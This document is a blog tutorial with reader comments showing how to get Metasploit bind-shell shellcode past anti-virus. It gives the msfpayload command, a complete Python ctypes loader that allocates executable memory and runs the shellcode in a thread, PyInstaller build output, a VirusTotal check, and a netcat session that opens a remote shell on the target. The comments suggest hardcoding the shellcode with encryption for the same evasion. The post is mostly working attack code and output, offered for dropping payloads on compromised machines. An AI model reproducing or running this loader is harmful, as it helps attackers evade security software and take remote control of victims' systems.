Execute Shellcode, Bypassing Anti-Virus…

Hello,

I am going to demonstrate a little trick that lets you execute shellcode without the binary that carries it being flagged by anti-virus. It is publicly known; I did not discover it. The shellcode used in this example is the common Metasploit Windows Bind TCP shell, but any shellcode will do; I have chosen this one for simplicity.

As I’m sure you’re all aware, the standard Metasploit Windows bind shell is flagged by even the most basic anti-virus solutions.

So, first of all let’s generate a Metasploit payload:

root@kali:~# msfpayload windows/shell_bind_tcp LPORT=31337 C | grep -v 'unsigned' | grep -v '*' | sed s'/"//g' | sed s'/;//g' | tr "\n" "," | sed s'/,//g' && echo ""
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
root@kali:~#

Copy the line of shellcode that is returned; we will paste it into the binary later. Be aware that if you change the payload the command above may not work as-is, since the grep/sed chain is written around the shape of this payload's msfpayload output (it strips the C declaration, comment lines, quotes, semicolons and newlines to leave only the opcodes).

To follow along you must have Python 2.7 and PyInstaller installed (PyInstaller 2.1 is used below). I will not cover how to install these as their respective sites do it well.

The following Python script takes the shellcode as input, allocates a readable, writable and executable region with VirtualAlloc, copies the shellcode into it with RtlMoveMemory, starts a thread at that address with CreateThread and blocks on it with WaitForSingleObject. Because the shellcode only arrives at run time, the binary that anti-virus gets to scan contains nothing for a signature to match. Here is the Python code:

#!C:\Python27\python.exe

from ctypes import *

# Grab shellcode from the user so it is not hardcoded in the binary.
# Python 2's input() evaluates what is pasted, which is why the shellcode
# has to be quoted: '\xfc\xe8...' evaluates to a str of raw bytes.
sc = bytearray(input("Paste the shellcode inside single quotes:\n\n"))
print "\n\nRunning shellcode in memory...\n\n"

# Reserves and commits a region of pages in the virtual address space of the
# calling process. 0x3000 = MEM_COMMIT | MEM_RESERVE and 0x40 =
# PAGE_EXECUTE_READWRITE, so the region is writable and executable at once.
# The allocation is named ptr so it does not shadow ctypes' pointer() below.
ptr = windll.kernel32.VirtualAlloc(c_int(0),
                                   c_int(len(sc)),
                                   c_int(0x3000),
                                   c_int(0x40))

buf = (c_char * len(sc)).from_buffer(sc)

# RtlMoveMemory copies the contents of a source memory block to a destination
# memory block, and supports overlapping source and destination memory blocks.
windll.kernel32.RtlMoveMemory(c_int(ptr),
                              buf,
                              c_int(len(sc)))

# Creates a thread to execute within the virtual address space of the calling
# process, using the RWX buffer as its start address.
ht = windll.kernel32.CreateThread(c_int(0),
                                  c_int(0),
                                  c_int(ptr),
                                  c_int(0),
                                  c_int(0),
                                  pointer(c_int(0)))

# Waits until the specified object is in the signaled state or the time-out
# interval elapses; -1 is INFINITE, so the process stays alive for as long as
# the shellcode thread is running.
windll.kernel32.WaitForSingleObject(c_int(ht), c_int(-1))

print "Completed, your shellcode has been injected into memory and should be running..."

Take the above Python script and compile it to a win32 executable using PyInstaller (-F bundles everything into a single .exe):

C:\Users\mike.evans\Desktop\AV>c:\Python27\Scripts\pyinstaller.exe -F crypter2.py
82 INFO: wrote C:\Users\mike.evans\Desktop\AV\crypter2.spec
117 INFO: Testing for ability to set icons, version resources...
247 INFO: ... resource update available
252 INFO: UPX is not available.
283 INFO: Processing hook hook-os
424 INFO: Processing hook hook-time
430 INFO: Processing hook hook-cPickle
510 INFO: Processing hook hook-_sre
667 INFO: Processing hook hook-cStringIO
780 INFO: Processing hook hook-encodings
799 INFO: Processing hook hook-codecs
1440 INFO: Extending PYTHONPATH with C:\Users\mike.evans\Desktop\AV
1440 INFO: checking Analysis
1441 INFO: building Analysis because out00-Analysis.toc non existent
1441 INFO: running Analysis out00-Analysis.toc
1444 INFO: Adding Microsoft.VC90.CRT to dependent assemblies of final executable
1917 INFO: Searching for assembly x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_none ...
1918 INFO: Found manifest C:\Windows\WinSxS\Manifests\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.21022.8_none_bcb86ed6ac711f91.manifest
1925 INFO: Searching for file msvcr90.dll
1927 INFO: Found file C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.21022.8_none_bcb86ed6ac711f91\msvcr90.dll
1927 INFO: Searching for file msvcp90.dll
1928 INFO: Found file C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.21022.8_none_bcb86ed6ac711f91\msvcp90.dll
1930 INFO: Searching for file msvcm90.dll
1930 INFO: Found file C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.21022.8_none_bcb86ed6ac711f91\msvcm90.dll
2058 INFO: Analyzing C:\Python27\lib\site-packages\pyinstaller-2.1-py2.7.egg\PyInstaller\loader\_pyi_bootstrap.py
2078 INFO: Processing hook hook-os
2102 INFO: Processing hook hook-site
2128 INFO: Processing hook hook-encodings
2260 INFO: Processing hook hook-time
2267 INFO: Processing hook hook-cPickle
2351 INFO: Processing hook hook-_sre
2500 INFO: Processing hook hook-cStringIO
2625 INFO: Processing hook hook-codecs
3140 INFO: Processing hook hook-pydoc
3322 INFO: Processing hook hook-email
3401 INFO: Processing hook hook-httplib
3461 INFO: Processing hook hook-email.message
3560 INFO: Analyzing C:\Python27\lib\site-packages\pyinstaller-2.1-py2.7.egg\PyInstaller\loader\pyi_importers.py
3628 INFO: Analyzing C:\Python27\lib\site-packages\pyinstaller-2.1-py2.7.egg\PyInstaller\loader\pyi_archive.py
3693 INFO: Analyzing C:\Python27\lib\site-packages\pyinstaller-2.1-py2.7.egg\PyInstaller\loader\pyi_carchive.py
3752 INFO: Analyzing C:\Python27\lib\site-packages\pyinstaller-2.1-py2.7.egg\PyInstaller\loader\pyi_os_path.py
3763 INFO: Analyzing crypter2.py
3849 INFO: Hidden import 'codecs' has been found otherwise
3851 INFO: Hidden import 'encodings' has been found otherwise
3852 INFO: Looking for run-time hooks
4213 INFO: Using Python library C:\Windows\system32\python27.dll
4450 INFO: Warnings written to C:\Users\mike.evans\Desktop\AV\build\crypter2\warncrypter2.txt
4470 INFO: checking PYZ
4471 INFO: rebuilding out00-PYZ.toc because out00-PYZ.pyz is missing
4473 INFO: building PYZ (ZlibArchive) out00-PYZ.toc
5601 INFO: checking PKG
5604 INFO: rebuilding out00-PKG.toc because out00-PKG.pkg is missing
5605 INFO: building PKG (CArchive) out00-PKG.pkg
6776 INFO: checking EXE
6777 INFO: rebuilding out00-EXE.toc because crypter2.exe missing
6779 INFO: building EXE from out00-EXE.toc
6818 INFO: Appending archive to EXE C:\Users\mike.evans\Desktop\AV\dist\crypter2.exe

Now that we have the binary, let's upload it to VirusTotal and see what it scores:

[Image: VirusTotal scan result for crypter2.exe]

Excellent, no engine flags it. Let's drop the binary onto the target machine and paste in the shellcode generated earlier:

C:\Users\mike.evans\Desktop\AV\dist>crypter2.exe
Paste the shellcode inside single quotes:

'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'

Running shellcode in memory...

Excellent, so the binary wasn't flagged and it executed our shellcode in memory. The bind shell should now be listening on port 31337 on the target, so connecting to it should give us a shell:

dustys-air:~ dusty$ nc 172.16.40.208 31337
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\mike.evans\Desktop\AV\dist>whoami
whoami
win-2q626uv3pte\mike.evans

C:\Users\mike.evans\Desktop\AV\dist>

This technique can be handy in situations where you just want to drop a payload and the AV keeps picking it up: the loader that lands on disk carries no shellcode, so there is nothing static for the scanner to match until the payload is pasted in at run time.

5 thoughts on “Execute Shellcode, Bypassing Anti-Virus…”

  1. … … … UH?!? The shellcode is just passed as a command-line parameter!!! Should we ask the victim “Hi, can you start the attached .exe file and paste the “0xshellcode” argument into it? Thanks!”? How can we use it in a vulnerability exploitation!? Why the fuck do we care about “shellcode detection” by AV (which is nonsense)? Why use virustotal on a file which does nothing by itself? In this state, just do a “system(argv[1])” executable, it will be the same thing! Why use the win32 API with python and not directly with C/assembly? THIS IS SO LAME.

    1. Hi,

      Thank you for your comment.

      This was not aimed at social engineering type attacks where you coerce the victim into running the payload. It was aimed more at when you need to drop a payload on a compromised machine, but the AV is flagging it each time. In situations like these you can run the binary, paste in the shellcode of your choice and have it executed, bypassing AV.

      Yes, you can do the same thing in C by casting the buffer to a function pointer, like so: (*(int(*)()) shellcode)();. However I chose to do it in Python as I quite like the language.

      If you wanted a complete binary without the need to pass the shellcode in as an argument, then you could hardcode it and perform some form of encoding/decoding or runtime decryption on it, e.g. with weak AES keys. This way you could compile the script to a binary, not have to paste in the shellcode and still have it bypass AV…

      1. Okay, maybe I’ve been too aggressive… Sorry.

        > If I want to execute something on a compromised machine, it won’t be a shellcode. And if I want to execute a shellcode, I will just transmit it over the network to a dedicated tool (i.e. Poison Ivy RAT commands, which are mostly shellcodes).
        > I was just wondering why not use the kernel32.dll APIs. I believe the shellcode() call won’t work because it’s not stored in an executable memory region. You must perform a VirtualProtect() first.
        > The last remark is just about packing (/encrypting) executable code, and it can be detected by antiviruses like KAV.

        Thanks for your reply, sorry again for the aggressive tone :/

  2. I forgot to mention: initially the shellcode was hardcoded as is. The same technique was followed as in this post, and the resulting .exe bypassed all AVs without needing to do anything more. When I came to write the blog post, one AV vendor was flagging it, so I changed it to accept the shellcode as an argument to the binary.
